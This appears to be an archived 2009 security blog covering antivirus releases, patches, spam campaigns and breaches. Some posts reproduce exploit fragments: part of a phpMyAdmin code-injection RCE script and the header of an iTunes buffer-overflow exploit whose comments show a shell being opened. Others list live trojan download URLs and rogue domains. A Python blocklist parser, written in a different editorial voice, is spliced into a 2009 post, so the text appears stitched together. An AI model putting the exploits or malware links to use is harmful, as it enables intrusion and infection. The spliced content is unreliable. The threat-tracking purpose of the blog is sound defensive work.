Friday, June 26, 2009

Microsoft Security Essentials 'Outlook'!

First view after installing Microsoft's antivirus: it updates the virus definitions before it functions properly.




Make sure it gets the latest spyware definitions.


Scanned a real malicious sample and it works!


Customize your personal settings


Memory footprint as observed in Process Explorer

Wednesday, June 24, 2009

pmaPWN! - phpMyAdmin Code Injection RCE Scanner & Exploit

Reference: http://www.milw0rm.com/exploits/8992

<?php
// The opening condition was cut off in the source; "== 1" (script invoked with
// no target argument) is the reading consistent with the surviving "1) {".
if ($argc == 1) {
    print "|****************************************************************|\n";
    print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
    print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
    print " This is PHP version original http://milw0rm.com/exploits/8921\n";
    print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
    print " greetz: Hacking Expose!, HM Security, darkc0de\n";
    print "|****************************************************************|\n";
    print "\n";
    print "Usage: php $argv[0] \n";
    exit;
}

// Banner to the console
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";

// Mirror the banner into the run log (opened in append mode)
$Handlex = fopen("pmaPWN.log", "a+");
fwrite($Handlex, "|****************************************************************|\n");
fwrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
fwrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
fwrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
fwrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
fwrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
fwrite($Handlex, "|****************************************************************|\n\n");

................................................

Tuesday, June 23, 2009

Microsoft Security Essentials beta version -- free anti-malware software

Microsoft released the beta version of their free antivirus, "Microsoft Security Essentials", today, 23-June-09. It is available for download from http://www.microsoft.com/security_essentials/

This product is supported on XP (32-bit), Vista and the future Windows 7 (32-bit), and Vista and the future Windows 7 (64-bit). The installer is 3.73MB for Vista and the future Windows 7 (64-bit), 7.51MB for XP, and 4.73MB for Vista and the future Windows 7 (32-bit). The installer requires less space than those of other security products.


Although Microsoft now provides free anti-malware, web threats remain the main threat these days.

Download link:

Monday, June 22, 2009

Multiple Exploiting IE8/IE7 XSS Vulnerability

80vul security researchers disclosed several related XSS issues for IE7/IE8.

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2009/06/22
References: http://www.80vul.com/ie8/Multiple%20Exploiting%20IE8IE7%20XSS%20Vulnerability.txt



........[continue]....
........[testing].......

So the results are:
---------------------------------------------------------
IE | alert
---------------------------------------------------------
ie7: xss4/xss3/xss2/xss1/xss8/xss/xss11/xss7/xss6/xss9
------------------------------------------------------
ie8: xss4/xss1/xss11/xss6
---------------------------------------------------------

Disclosure Timeline:

2009/05/01 - Found this Vulnerability
2009/06/22 - Public Disclosure

Greeting:

ycosxhack[http://hi.baidu.com/ycosxhack],Not his test,not this Vulnerability.

Sunday, June 21, 2009

Apple iTunes 8.1.1.10 PoC exploit

Apple iTunes 8.1.1.10

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>




Reference: http://www.milw0rm.com/exploits/8934

Saturday, June 20, 2009

Suspicious domain lists 20-June-09

IP Address: 159.226.7.162
Suspicious domain list:

2l2l2l2.cn
aidexvqo.cn
bbs.fzlkj.cn
dp-dtudio.cn
gddltj.cn
golck.cn
gussmanntech.co.cn
qssh.cn
www.101-shop.cn
www.1x5x.cn
www.cdk1718.cn
www.cngudao.cn
www.feisui168.cn
www.foyal.cn
www.huaibb.cn
www.huatl.cn
www.jnjiayi.cn
www.k555.cn
www.onecf.cn
www.pingxiwaimao.cn
www.qeyoob.cn
www.zangh.cn
yiihoo.cn

Pharmaceutical spamming in Yahoo Groups

Another spam technique was revealed when spammers kept spamming users' Yahoo accounts. Messages sent from the spamming engine entice users to click on a particular Yahoo Groups link such as " http://groups.yahoo.com/group/qahykimuqihog25/message/1 ". Users are redirected to fake websites once they click on the page shown.






Suspicious rogue Domain
IP Address: 112.137.162.136

adulisan.ru
alevut.ru
anakondo4ka.ru
asoldina.ru
bumhuful.cn
buxmamoq.cn
cisoti.ru
dahoya.ru
doleyole.ru
drapindym.ru
ebenep.ru
edahoyeg.ru
ejequhos.ru
elovopaz.ru
glitemalle.ru
grendetta.ru
hicoqaze.ru
ilohaded.ru
iqegix.ru
jujegosa.ru
kamoku.ru
kodezeyi.ru
lohoxo.ru
lumade.ru
negatople.ru
newagi.ru
nikoragyas.ru
nokavaku.ru
odomecew.ru
ofovav.ru
omajun.ru
pakixomi.ru
poditoye.ru
qisdebam.cn
resukatu.ru
rosavi4ka.ru
ruguvise.ru
runosu.ru
rx-stock.com
sabrino4ka.ru
symerary.ru
ubevex.ru
ubozayuy.ru
ugofaqud.ru
uhejar.ru
uhurisuf.ru
uqikuk.ru
vahvelax.cn
vekowo.ru
wewqesot.cn
wocici.ru
www.bifdafuy.cn
www.bigmubeg.cn
www.boblifeh.cn
www.cankowiq.cn
www.caynivun.cn
www.dexqocam.cn
www.difyolov.cn
www.edihilen.ru
www.fahxovow.cn
www.fenduxom.cn
www.fepxesoj.cn
www.fihheqal.cn
www.foswahop.cn
www.gamlokuh.cn
www.garlahos.cn
www.gaxhamoq.cn
www.gesriliz.cn
www.gibmuqil.cn
www.gimjojal.cn
www.givgilar.cn
www.giykifoq.cn
www.gupvusaq.cn
www.gutqepav.cn
www.guyvesuq.cn
www.hafriqeg.cn
www.hagcekud.cn
www.haljujus.cn
www.hanqovid.cn
www.haydecil.cn
www.hecloren.cn
www.hexwafol.cn
www.hobqosuv.cn
www.hoxtaler.cn
www.hucjapof.cn
www.hukwaxoh.cn
www.huqxosev.cn
www.huvpebim.cn
www.japjenor.cn
www.jezheyay.cn
www.jezmuruf.cn
www.jinpaqur.cn
www.jitcuhul.cn
www.jivpavon.cn
www.jumraton.cn
www.kamvivag.cn
www.ketnatoj.cn
www.kihlitol.cn
www.kizkitok.cn
www.koshufih.cn
www.lafwivok.cn
www.libdifuh.cn
www.ligcudok.cn
www.loxcutot.cn
www.lozyuvos.cn
www.lucwemos.cn
www.mafdarem.cn
www.mazhoraq.cn
www.meqgiyap.cn
www.mewkofit.cn
www.mexmojem.cn
www.motvajid.cn
www.mugpucer.cn
www.muvxasuh.cn
www.newyepen.cn
www.nofguxuk.cn
www.nupvoquk.cn
www.ofopadej.ru
www.okaciq.ru
www.ovejizod.ru
www.ovewup.ru
www.paxtapaj.cn
www.pekhidib.cn
www.pemqopig.cn
www.piqfuvih.cn
www.pitvasug.cn
www.pityiruz.cn
www.qagposad.cn
www.qockuqox.cn
www.qujcumul.cn
www.qusmameh.cn
www.rotcoziq.cn
www.ruhtecuf.cn
www.rukdutuk.cn
www.ruytohod.cn
www.sabhufaf.cn
www.salxamuv.cn
www.satqadek.cn
www.sebqotaz.cn
www.sigduzef.cn
www.sipsuliy.cn
www.sixtagoy.cn
www.sorfecow.cn
www.sulboqow.cn
www.tatiano4ke.ru
www.telguhed.cn
www.tiffelad.cn
www.tillibus.cn
www.titqesay.cn
www.tuhcaqud.cn
www.ugubif.ru
www.vapzimar.cn
www.vebjikol.cn
www.vermotan.cn
www.vizrador.cn
www.vowkomag.cn
www.vuddijuf.cn
www.vugbonic.cn
www.wozcinin.cn
www.xaggosap.cn
www.xewcusep.cn
www.xilxasin.cn
www.xorkiceb.cn
www.xozhemih.cn
www.xugregek.cn
www.yitlediq.cn
www.yoddoqof.cn
www.yucsozur.cn
www.yuvwoxig.cn
www.zalkemis.cn
www.zarlobim.cn
www.zicpestx.cn
www.ziqlivid.cn
www.zitfanef.cn
www.zitqezap.cn
www.zivliwup.cn
xesanu.ru
yocuhe.ru
zatufive.ru
zexakode.ru


Note: If you find this information useful, click on an advertisement to support my domain fees.

Thursday, June 11, 2009

Malicious URLs * 11-June-09*

Malicious link
Domain: 216.226.131.77/

Level 1: http://216.226.131.77/seraph/door/news/index.htm
Level 2: http://216.226.131.77/seraph/door/news/flash.htm
Level 3: http://216.226.131.77/seraph/door/news/iss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 3: http://216.226.131.77/seraph/door/news/fss.html
Level 4: http://216.226.131.77/seraph/door/news/swfobject.js
Level 4: http://js.tongji.linezing.com/930456/tongji.js
Level 4: http://img.tongji.linezing.com/930456/tongji.gif
Level 4: http://216.226.131.77/seraph/door/news/i16.swf
Level 4: http://216.226.131.77/seraph/door/news/i28.swf
Level 4: http://216.226.131.77/seraph/door/news/i45.swf
Level 4: http://216.226.131.77/seraph/door/news/i47.swf
Level 4: http://216.226.131.77/seraph/door/news/i64.swf
Level 4: http://216.226.131.77/seraph/door/news/i115.swf
Level 2: http://216.226.131.77/seraph/door/news/a4.htm
Level 3: http://216.226.131.77/seraph/door/news/14.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/office.htm
Level 3: http://216.226.131.77/seraph/door/news/of.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 2: http://216.226.131.77/seraph/door/news/02.htm
Level 3: http://216.226.131.77/seraph/door/news/set.js
Level 2: http://216.226.131.77/seraph/door/news/pef.pdf

Trojan file was submitted to VirusTotal for analysis.



Domain: *cv9u.cn/

Level 1: http://www.cv9i.cn/index.htm
Level 2: http://www.cv9i.cn/flash.htm
Level 3: http://www.cv9i.cn/iss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 3: http://www.cv9i.cn/fss.html
Level 4: http://www.cv9i.cn/swfobject.js
Level 4: http://www.cv9i.cn/i16.swf
Level 4: http://www.cv9i.cn/i28.swf
Level 4: http://www.cv9i.cn/i45.swf
Level 4: http://www.cv9i.cn/i47.swf
Level 4: http://www.cv9i.cn/i64.swf
Level 4: http://www.cv9i.cn/i115.swf
Level 2: http://www.cv9i.cn/a4.htm
Level 3: http://www.cv9i.cn/14.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/office.htm
Level 3: http://www.cv9i.cn/of.js
Level 4: http://www.cxi7.cn/t.exe
Level 2: http://www.cv9i.cn/02.htm
Level 3: http://www.cv9i.cn/set.js
Level 2: http://www.cv9i.cn/pef.pdf

Malicious file was submitted to VirusTotal for analysis.


Disclaimer:
The URL links posted above contain malicious files/trojans/viruses that could harm your systems and steal your information. Usage: the URL links posted are intended only for IT security officers, researchers and personal collections. Any harmful actions are totally prohibited. Use them at your own risk and wisely. Any risks and consequences are entirely outside this web owner's responsibility.

McAfee whitepaper on browser attacks

Frankly, I love McAfee so much. They are one of the giant security vendors that has published so many whitepapers recently. The document is very informative about the current security threats and trends. It also gives me lots of inspiration about how important security is to our lives.

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site


If you are wondering where to download the whitepaper, you can get it in full from http://www.mcafee.com/us/threat_center/white_paper.html




P/S: I do not work for McAfee; I am just saying something based on my personal judgement.

Wednesday, June 10, 2009

Microsoft's Patch Tuesday released 10 patches in June 2009

Microsoft recently released their Patch Tuesday updates, addressing 32 vulnerabilities with 10 security bulletins: six "critical", three "important" and one "moderate". However, the DirectShow patch is not included in this release cycle.

Bulletin:
MS09-018 --Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)
MS09-022 --Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)
MS09-019 --Cumulative Security Update for Internet Explorer (969897)
MS09-027 --Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)
MS09-021 --Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)
MS09-024 --Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)
MS09-026 --Vulnerability in RPC Could Allow Elevation of Privilege (970238)
MS09-025 --Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
MS09-020 --Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
MS09-023 --Vulnerability in Windows Search Could Allow Information Disclosure (963093)


Lots of exploit websites will soon be available to target systems that are not on the latest patches, especially for MS09-019. Security researchers and analysts, be ready for another round of cyber combat!


Reference:
http://www.microsoft.com/technet/security/bulletin/ms09-jun.mspx

Malicious URLs * 10-June-09*

IP Address:

60.191.239.162
203.93.208.86
58.17.3.41


Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
hubnayeq.cn
qcyt.daxzegef.cn
qxieaq.olesej.ru
vyvqw.mimsijix.cn
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
opqt.lelwatiq.cn
yx.yenseloz.cn
aljfqj.ciptikuh.cn
qcyt.daxzegef.cn


The Web's Most Dangerous Search Terms

Have you ever thought about which keywords are the most dangerous to use in a search engine? Most of the dangerous keywords can lead you to websites that could harm your systems.
The phrases include "Lyrics, myspace, free music downloads, game cheats, web, Olympics......"

Security provider McAfee did excellent research in publishing the whitepaper "The Web's Most Dangerous Search Terms". For general users, it is good reading material to improve security awareness before using any search engine. This document is also good reference material for the dark side when hosting websites on the Internet: McAfee's statistics tell them which categories they should focus on to increase their attack rate.


Reference:

1. http://us.mcafee.com/en-us/local/docs/most_dangerous_searchterm_us.pdf
2. http://blogs.zdnet.com/security/?p=3457

phpMyAdmin PHP Code Injection RCE PoC

An attacker can exploit this vulnerability to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.




Reference:
1. http://www.securityfocus.com/bid/34236/discuss
2. http://www.milw0rm.com/exploits/8921
3. http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
4. http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
5. http://www.gnucitizen.org/blog/cve-2009-1151-phpmyadmin-remote-code-execution-proof-of-concept/

Tuesday, June 9, 2009

Penetration: from application down to OS. Getting OS access using Oracle Database unprivileged user

Digital Security Research Group published their whitepaper regarding penetration of Oracle databases.

Reference: http://dsecrg.com/pages/pub/show.php?id=17

Introduction:
Once upon a time during a penetration test of a corporate network I got an unprivileged account on an Oracle Database and my plan was to get an administrative shell on the server where its database was installed. The server was running the Windows 2003 server operating system and the Oracle database was running with the privileges of the Administrator (not LOCAL_SYSTEM) account. It is a quite common situation, though. The default way is to escalate privileges on the database using one of the latest SQL Injection vulnerabilities and then use DBA privileges to gain access to the OS using one of the popular methods such as ExtProc, Java, extjob etc. [1] So it seems to be quite simple and I thought about other ways. What if the database is patched with the latest CPU updates and additionally it has some kind of Intrusion Detection System which can find 0-day vulnerabilities or something like this and it is impossible to escalate privileges using SQL Injections? Of course there are some methods of escalating privileges without exploits. For example: find cleartext passwords in the database or connect to the listener internally and rewrite the log file or escalate privileges using some dangerous roles such as ‘SELECT ANY DICTIONARY’, ‘CREATE ANY TRIGGER’ or something like this. But these methods can’t give you 100% success. I guess there must be another way, maybe not universal but better than described.
In short, this paper describes investigations into getting an administrative shell on a server while having only unprivileged rights on the Oracle Database......

Malware related links *gianttoplocate.cn* - 09 June

Malicious link
Level 0: http: //yournameshop.cn:8080/index.php
Level 1: http: //yournameshop.cn:8080/cache/readme.pdf
(Trojan)Level 2: http: //gianttoplocate.cn:8080/landig.php?id=1
Level 1: http: //yournameshop.cn:8080/cache/flash.swf

Index.php


Decoded index.php


From the script, it attempts to download a malicious PDF that abuses util.printf() and a malicious Flash SWF if the Adobe software is not on the latest patch. Finally, it downloads a trojan file from the gianttoplocate website.
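The chain above, like the "Level N:" trees in the 11-June post and the "Domain lists:" blocks elsewhere on this page, is crawler output that a defender mostly wants in two forms: the root-to-payload path (which page pulled in the trojan) and a blocklist to run logs against. The Python below is an added example written for this page, not the blog author's tool or any vendor's code. It parses the Level lines, including the defanged "http: //" spelling and the "(Trojan)" tag in either position, rebuilds parent links from the level numbers, extracts each payload path, folds a "*.domain" wildcard list into a suffix match, and checks constructed proxy log lines. The chain URLs and domain entries are copied from the posts; the proxy log lines, timestamps and client IPs are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt in the page's crawler format: part of the 11-June tree plus the
# defanged ("http: //") 09-June chain.  URLs are the ones listed in the posts.
SAMPLE_CHAIN = """\
Level 1: http://216.226.131.77/seraph/door/news/index.htm
Level 2: http://216.226.131.77/seraph/door/news/flash.htm
Level 3: http://216.226.131.77/seraph/door/news/iss.html
Level 2: http://216.226.131.77/seraph/door/news/a4.htm
Level 3: http://216.226.131.77/seraph/door/news/14.js
Level 4: (Trojan) http://209.162.188.225/calcs.exe
Level 0: http: //yournameshop.cn:8080/index.php
Level 1: http: //yournameshop.cn:8080/cache/readme.pdf
(Trojan)Level 2: http: //gianttoplocate.cn:8080/landig.php?id=1
"""

# Constructed excerpt of a "Domain lists:" block; "*.x" means any subdomain of x.
SAMPLE_DOMAIN_LIST = """\
Domain lists:
*.cjkoeoe.cn
netdnshosting.com
www.qoxiwabal.cn
"""

# Constructed proxy log lines: epoch, client IP, method, URL, status.
SAMPLE_PROXY_LOG = """\
1244678401.101 10.0.0.5 GET http://www.example.org/index.html 200
1244678402.332 10.0.0.5 GET http://216.226.131.77/seraph/door/news/a4.htm 200
1244678403.874 10.0.0.5 GET http://209.162.188.225/calcs.exe 200
1244678404.010 10.0.0.7 GET http://gianttoplocate.cn:8080/landig.php?id=1 200
1244678405.500 10.0.0.9 GET http://ns2.cjkoeoe.cn/x.php 200
1244678406.700 10.0.0.9 GET http://qoxiwabal.cn/ 200
"""

LINE_RE = re.compile(r"^\s*(?:\((?P<tag0>\w+)\))?\s*Level\s+(?P<level>\d+):\s*"
                     r"(?:\((?P<tag1>\w+)\))?\s*(?P<url>\S.*?)\s*$")

def refang(url):
    """Undo the 'http: //' defanging used on the page so urlsplit can parse it."""
    return re.sub(r"^(https?):\s*//", r"\1://", url.strip())

def parse_chain(text):
    """Nodes {level, url, host, tag, parent}; parent = nearest earlier shallower node."""
    nodes, stack = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        level, url = int(m.group("level")), refang(m.group("url"))
        while stack and stack[-1][0] >= level:   # leave deeper and sibling branches
            stack.pop()
        nodes.append({"level": level, "url": url, "host": urlsplit(url).hostname,
                      "tag": m.group("tag0") or m.group("tag1"),
                      "parent": stack[-1][1] if stack else None})
        stack.append((level, len(nodes) - 1))
    return nodes

def payload_chains(nodes):
    """For every tagged node, e.g. '(Trojan)', the root-to-payload URL path."""
    chains = []
    for i, n in enumerate(nodes):
        if n["tag"]:
            path, j = [], i
            while j is not None:
                path.append(nodes[j]["url"])
                j = nodes[j]["parent"]
            chains.append((n["tag"], path[::-1]))
    return chains

def build_blocklist(nodes, domain_list_text=""):
    """Exact hosts (chain hosts + plain list entries) and '*.' wildcard suffixes."""
    exact = {n["host"] for n in nodes if n["host"]}
    suffixes = set()
    for line in domain_list_text.splitlines():
        d = line.strip().lower()
        if not d or d.endswith(":"):          # skip blanks and the header line
            continue
        if d.startswith("*."):
            suffixes.add(d[2:])
        else:
            exact.add(d)
    return exact, suffixes

def host_listed(host, exact, suffixes):
    host = host.lower()
    return host in exact or any(host.endswith("." + s) for s in suffixes)

def match_proxy_log(log_text, exact, suffixes):
    """(client IP, host) for every log line whose URL host is on the blocklist."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r"https?://\S+", line)
        host = urlsplit(m.group(0)).hostname if m else None
        if host and host_listed(host, exact, suffixes):
            hits.append((line.split()[1], host))
    return hits

if __name__ == "__main__":
    nodes = parse_chain(SAMPLE_CHAIN)
    print(payload_chains(nodes))
    print(match_proxy_log(SAMPLE_PROXY_LOG, *build_blocklist(nodes, SAMPLE_DOMAIN_LIST)))
```

Run as a script it prints the two payload paths and four hits. The last log line, qoxiwabal.cn, is deliberately left unmatched: only www.qoxiwabal.cn is on the list and no "*." entry covers the bare domain, which is exactly the distinction the "*.domain" entries in the posts' lists are drawing.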




The trojan was submitted to Virustotal for analysis.





Zero-day vulnerability in the LxLabs HyperVM software caused 100,000 websites to be hacked

Resource: http://www.neowin.net/news/main/09/06/08/100000-websites-destroyed-by-hackers#comments

As many as 100,000 websites have been destroyed by hackers targeting server virtualisation software HyperVM, which powers most virtual private server (VPS) hosting companies.

Most of the VPS systems hosted by Vaserv, and its sister companies CheapVPS and FSCKVPS were taken offline, with data on some of its servers destroyed without backups, when the hackers exploited a zero-day vulnerability in the LxLabs HyperVM software to gain root access to its servers. The hackers were then able to run commands (such as "rm -rf", Linux parlance for "remove everything, all files and folders, no questions asked,") to destroy both user and system data, preventing the servers from booting, and preventing users from recovering data.

Vaserv has estimated that almost half of the data hosted on their servers has been destroyed by the attack.

The identity of the hackers is unknown, and no hacking groups have claimed the attack. Vaserv stated that "This wasn't someone randomly scanning things. It was a deliberate attack on our infrastructure." It has also stated that, although the hackers had full root access to its systems, all sensitive data such as names, addresses, and credit card details were encrypted.

It is unknown whether any other hosting companies running HyperVM have been attacked. Anybody who uses a server hosted by Vaserv or its sister companies can check the progress of the rescue operation here.

Updated 11 June:
Breaking news!

The Bangalore-based developer was found dead by suicide on Monday, because of the 0day exploit in HyperVM... Poor guy!

Monday, June 8, 2009

Facebook user email spam in my mailbox

In the last two days I received a few messages claiming to be sent from Facebook and pretending to come from somebody you know... Luckily it wouldn't work on me, because I know that I did not register for Facebook using my Hotmail account. So those few messages must be something interesting to look at. They try to fool users or trick them into opening the message and clicking on the links inside. Someone must earn lots of money from this kind of massive clicking.. :)







When opening these junk messages one by one, they look like spam messages for adult and pharmaceutical websites. Of course, this technique is not new; we have seen similar spamming in PDF, document, Flash and other formats. I strongly believe this is a kind of continuous experiment by spammers to challenge anti-spam engines...

Sunday, June 7, 2009

Search for the "Own3d" string in Google

While searching for the string "Own3d" in Google, you can easily find a few websites hosting pages that contain "Own3d".

http://pswm.org/templates/own3d.html





http://www.permislegal.com/

Hackers target Windows XP ATM machines

Original Article: MaximumPC

"Trustwave's SpiderLabs performed the analysis of malware found installed on compromised ATMs in the Eastern European region," Trustwave said. "This malware captures magnetic stripe data and PIN codes from the private memory space of transaction-processing applications installed on a compromised ATM."

According to the report, the compromised ATMs all ran Microsoft's Windows XP operating system. The malware is installed and activated through a dropper file and once compromised, hackers then have full control over the machine via a customized user interface and accessible by inserting a special controller card into the ATM.

ACAi ELITE ..and Dr.Max Man Spam......





IP Address: 220.248.184.7

Domain lists:
callnices.com
cxvjpiet.cn
fmdwyhygh.boqaqaroy.cn
idyogtri.cn
joinmake.com
litefort.com
makeflat.com
nafaxunap.cn
okomptfh.lufecumul.cn
phone.addresses.com
phone.theyellowpages.com
qomawuciv.cn
quincy.doyslho.cn
ricadigox.cn
rushpact.com
tafibahav.cn
wadeship.com
widewarm.com
www.aihleyvo.cn
www.bjopifde.cn
www.daqemumaw.cn
www.fhbpiii.cn
www.iorodl.cn
www.iyljoq.cn
www.iylkjoo.cn
www.mortgagemodifications247.com
www.muluqemuw.cn
www.ocaofca.cn
www.odlorid.cn
www.vppoiwrt.cn
www.wazadixih.cn
www.yaoaoe.cn
www.uiuungyo.cn
www.rljilup.cn
www.tvwewpw.cn
www.uiyasawo.cn
www.tvgrri.cn

IP Address: 220.248.167.110

Domain lists:
*.cjkoeoe.cn
*.clflqlyl.cn
*.curtcome.com
*.deyurabaw.cn
*.foladikat.cn
*.gigehonus.cn
*.grsiud.cn
*.hifediyen.cn
*.iyldjkoo.cn
*.jezuriteq.cn
*.jipilipuj.cn
*.netdnshosting.com
*.oinoqq.cn
*.oiyldyi.cn
*.qcjfonll.cn
*.qoxiwabal.cn
*.ruhubanim.cn
*.seervery.com
*.simicukoq.cn
*.thednsfactory.com
*.uinexjdo.cn
*.uisdwjto.cn
*.uiwbapdo.cn
*.yotusuziq.cn
ciifwu.cn
cjkoeoe.cn
clflqlyl.cn
deyurabaw.cn
foladikat.cn
gigehonus.cn
grsiud.cn
haroqokic.cn
hifediyen.cn
honoqituj.cn
iyldjkoo.cn
iylqcby.cn
jezuriteq.cn
jipilipuj.cn
nefuqadeq.cn
netdnshosting.com
ns1.netdnshosting.com
oinoqq.cn
oiyldyi.cn
qoxiwabal.cn
ruhubanim.cn
seervery.com
simicukoq.cn
tafukuyun.cn
targtar.cn
thednsfactory.com
uinexjdo.cn
uisdwjto.cn
uiwbapdo.cn
www.cjkoeoe.cn
www.qcjfonll.cn
www.qoxiwabal.cn
www.ruhubanim.cn
www.seervery.com
www.uinexjdo.cn
www.uisdwjto.cn
www.uiwbapdo.cn
www.yotusuziq.cn
www.uibloulo.cn
www.aizxrdio.cn
www.uidijsno.cn
www.uiifskdo.cn
www.ttieehj.cn
www.uiqrzljo.cn
www.uiuungyo.cn
www.uiemnzlo.cn
www.uijcopeo.cn
yorejiter.cn
yotusuziq.cn
zesezuqew.cn
zofuzmik.com

POPULAR On-Line BookStore was compromised to host malicious script

The POPULAR bookstore, with domain popular.com.sg, was compromised to host malicious code. POPULAR is quite famous, especially in SEA.

The malicious code was encoded, as you can see from the image.



The decoded malicious code shows that it redirects users to the exploit site "suptullog.com".





"suptullog.com" site...thanks to robtex.com



When connecting to "suptullog.com", the (PDF exploit) "http://suptullog.com//image/pfre.php" tries to exploit the user's system through a PDF vulnerability. A PDF file is downloaded to the system that heap-sprays and abuses the PDF functions Collab.getIcon() and Adobe's util.printf().



The malicious PDF then redirects to (Trojan) "http://suptullog.com/image/ouet.php" to download a malicious file called "install.exe".







Saturday, June 6, 2009

Temporarily handling DirectShow 0Day Exploit

For IE fans: Microsoft still has not released a patch for the DirectShow 0day vulnerability, and you will be lucky if they release it this month or next. As a temporary fix, Microsoft has published an article on their website on how to fix QuickTime in the registry. In addition, it is good practice to consider the following steps to adjust some configuration in the Security settings.

1. Open IE --> Tools --> Internet Options
2. Click Security tab, highlight Internet --> Click Custom Level
3. Disable "Run components not signed with Authenticode" and "Run components signed with Authenticode"

This setting does not fix the DirectShow vulnerability, but at least it can prevent successful attempts to exploit it.

Astalavista Hacking Security and Community was hacked

Original Article: http://pastebin.com/f751e9f5b

The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group

From <>:
>> 03. Who's behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.

>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.

